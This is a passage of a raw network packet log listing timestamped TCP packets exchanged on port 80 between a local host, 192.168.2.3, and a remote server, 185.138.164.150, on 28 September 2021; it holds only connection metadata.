Sep 28, 2021 08:53:35.735723019 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735727072 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735728025 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735743046 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735758066 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735774994 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735790014 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735794067 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735805035 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735821009 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735833883 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735838890 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735840082 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735856056 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735871077 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735886097 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735897064 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735910892 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735939980 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735948086 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.771096945 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.771147013 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.771172047 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.771187067 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.771193027 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.771277905 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.771289110 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.771600962 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.771640062 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.771656036 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.771660089 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.771698952 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.771725893 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.771781921 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.771785975 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.771836042 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.806229115 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806268930 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806287050 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806329012 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806353092 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806375980 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806427002 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806494951 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806516886 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806535959 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806555033 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806566000 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.806580067 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806602955 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.806602955 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806612968 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.806626081 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806633949 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.806646109 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.806648970 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806672096 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806693077 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806715012 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806736946 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806761026 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806785107 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806840897 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.806854010 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806876898 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806879044 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.806899071 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806921005 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806942940 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806967974 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.806969881 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.806991100 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.807025909 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.807032108 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.807097912 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.816003084 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.816035032 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.816056967 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.816073895 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.816078901 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.816107035 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.816121101 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.816165924 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.816174984 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.816195965 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.816237926 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.553443909 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.588450909 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.817991018 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.818054914 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.818094015 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.818121910 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.818161011 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.818207979 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.818253040 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.818280935 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.818362951 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.818404913 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.818589926 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.818633080 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.818737984 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.853771925 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.853809118 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.853828907 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.853847980 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.853868961 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.853893995 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.853915930 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.853935003 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.853965044 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.853986025 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.854001999 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.854027987 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.854048014 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.854065895 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.854079008 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.854120970 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.854182959 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.854454994 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.854481936 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.854556084 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.854579926 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.854594946 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.854674101 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.856678009 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.856781006 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.889033079 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889095068 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889134884 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889174938 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889214039 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889241934 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889281034 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889321089 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889358044 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889395952 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889431953 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889472008 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889494896 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.889508963 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889555931 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.889556885 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889601946 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889631033 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.889640093 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889679909 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889713049 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889749050 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889751911 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.889787912 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889827967 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889866114 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889879942 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.889904022 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.889909029 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889947891 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.889966011 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.889987946 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.890032053 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.890165091 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.890182972 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.890275955 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.890316963 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.890450954 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.890469074 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.890481949 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.890549898 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.890562057 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.890588045 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.890625954 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.890651941 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.890677929 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.890712023 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.890799046 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.890839100 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.890878916 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.890907049 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.890954018 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.890993118 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.891634941 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.891679049 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.891781092 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.925545931 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.925573111 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.925589085 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.925604105 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.925622940 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.925641060 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.925656080 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.925673008 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.925688982 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.925703049 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.925719023 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.925756931 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.925817966 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.925945044 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.927165031 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.927211046 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.927228928 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.927242041 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.927258015 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.927273989 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.927289963 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.927306890 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.927323103 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.927339077 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.927350044 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.927361012 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.927475929 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.927526951 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.927544117 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.927562952 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.927580118 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.927592039 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.927633047 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.927649021 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.927664995 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.927685022 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.927722931 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.927752972 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.927768946 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.927810907 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.927994967 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.928069115 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.928097963 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.928127050 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.928179979 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.928204060 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.928232908 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.928286076 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.928340912 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.928399086 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.928415060 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.928428888 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.928459883 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.928520918 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.928525925 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.928587914 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.928648949 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.928661108 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.928711891 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.928776026 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.928781033 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.928822041 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.928883076 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.928904057 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.928941011 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.929014921 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.929033041 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.929059982 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.929116964 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.929132938 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.929177046 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.929244995 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.961496115 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.961555004 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.961590052 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.961626053 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.961661100 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.961704969 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.961745024 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.961779118 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.961827993 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.961833000 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.961863995 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.961893082 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.961904049 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.961940050 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.961946011 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.961982965 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.962054014 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.963351011 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.963414907 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.963476896 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.963522911 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.963534117 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.963599920 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.963633060 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.963690042 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.963723898 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.963757038 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.963757992 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.963813066 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.963831902 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.963857889 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.963896036 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.963912964 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.963927984 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.963998079 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.964000940 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.964040041 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.964071989 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.964098930 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.964114904 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.964153051 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.964185953 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.964188099 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.964222908 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.964252949 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.964258909 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.964292049 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.964318037 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.964327097 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.964394093 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.964831114 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.964916945 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.964960098 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.964991093 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.965014935 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.965049982 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.965075970 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.965111017 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.965147972 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.965190887 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.965203047 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.965259075 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.965265036 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.965296984 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.965329885 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.965363026 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.965363979 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.965450048 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.966156960 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.966192007 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.966259956 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.966284037 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.966353893 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.966404915 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.966439009 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.966443062 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.966499090 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.966638088 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.966675043 CEST	80	49744	185.138.164.150	192.168.2.3
